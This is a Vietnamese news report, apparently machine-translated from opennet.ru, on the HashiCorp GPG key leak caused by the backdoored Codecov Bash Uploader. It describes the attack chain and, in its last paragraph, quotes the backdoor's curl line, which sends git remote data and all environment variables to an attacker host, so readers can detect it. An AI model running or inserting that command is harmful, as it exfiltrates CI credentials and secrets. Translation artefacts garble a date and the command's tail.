HashiCorp, được biết đến với việc phát triển các công cụ nguồn mở Vagrant, Packer, Nomad và Terraform, đã thông báo về vụ rò rỉ khóa GPG riêng được sử dụng để tạo chữ ký số xác minh các bản phát hành. Những kẻ tấn công có được quyền truy cập vào khóa GPG có thể thực hiện các thay đổi ẩn đối với các sản phẩm HashiCorp bằng cách xác minh chúng bằng chữ ký số chính xác. Đồng thời, công ty tuyên bố rằng trong quá trình kiểm toán, không có dấu vết cố gắng thực hiện các sửa đổi đó được xác định.
Hiện tại, khóa GPG bị xâm phạm đã bị thu hồi và một khóa mới đã được giới thiệu thay thế. Sự cố chỉ ảnh hưởng đến việc xác minh bằng cách sử dụng tệp SHA256SUM và SHA256SUM.sig chứ không ảnh hưởng đến việc tạo chữ ký số cho các gói Linux DEB và RPM được cung cấp thông qua Release.hashicorp.com, cũng như cơ chế xác minh bản phát hành cho macOS và Windows (AuthentiCode) .
Rò rỉ xảy ra do việc sử dụng tập lệnh Codecov Bash Uploader (codecov-bash) trong cơ sở hạ tầng, được thiết kế để tải xuống các báo cáo bảo hiểm từ các hệ thống tích hợp liên tục. Trong cuộc tấn công vào công ty Codecov, một cửa hậu đã được ẩn vào tập lệnh được chỉ định, qua đó mật khẩu và khóa mã hóa được gửi đến máy chủ của kẻ tấn công.
Để hack, kẻ tấn công đã lợi dụng một lỗi trong quá trình tạo hình ảnh Codecov Docker, cho phép chúng trích xuất dữ liệu truy cập vào GCS (Google Cloud Storage), cần thiết để thực hiện các thay đổi đối với tập lệnh Bash Uploader được phân phối từ codecov.io trang mạng. Những thay đổi này được thực hiện vào ngày 31 tháng XNUMX, không bị phát hiện trong hai tháng và cho phép kẻ tấn công trích xuất thông tin được lưu trữ trong môi trường hệ thống tích hợp liên tục của khách hàng. Bằng cách sử dụng mã độc được thêm vào, kẻ tấn công có thể lấy thông tin về kho lưu trữ Git đã được thử nghiệm và tất cả các biến môi trường, bao gồm mã thông báo, khóa mã hóa và mật khẩu được truyền đến các hệ thống tích hợp liên tục để tổ chức quyền truy cập vào mã ứng dụng, kho lưu trữ và dịch vụ như Amazon Web Services và GitHub.
Ngoài lệnh gọi trực tiếp, tập lệnh Codecov Bash Uploader đã được sử dụng như một phần của các trình tải lên khác, chẳng hạn như Codecov-action (Github), Codecov-circleci-orb và Codecov-bitrise-step, những trình tải lên này cũng bị ảnh hưởng bởi sự cố. Tất cả người dùng codecov-bash và các sản phẩm liên quan nên kiểm tra cơ sở hạ tầng của họ, cũng như thay đổi mật khẩu và khóa mã hóa. Bạn có thể kiểm tra sự hiện diện của cửa hậu trong tập lệnh bằng sự hiện diện của dòng Curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /tải lên/v2 || ĐÚNG VẬY
Nguồn: opennet.ru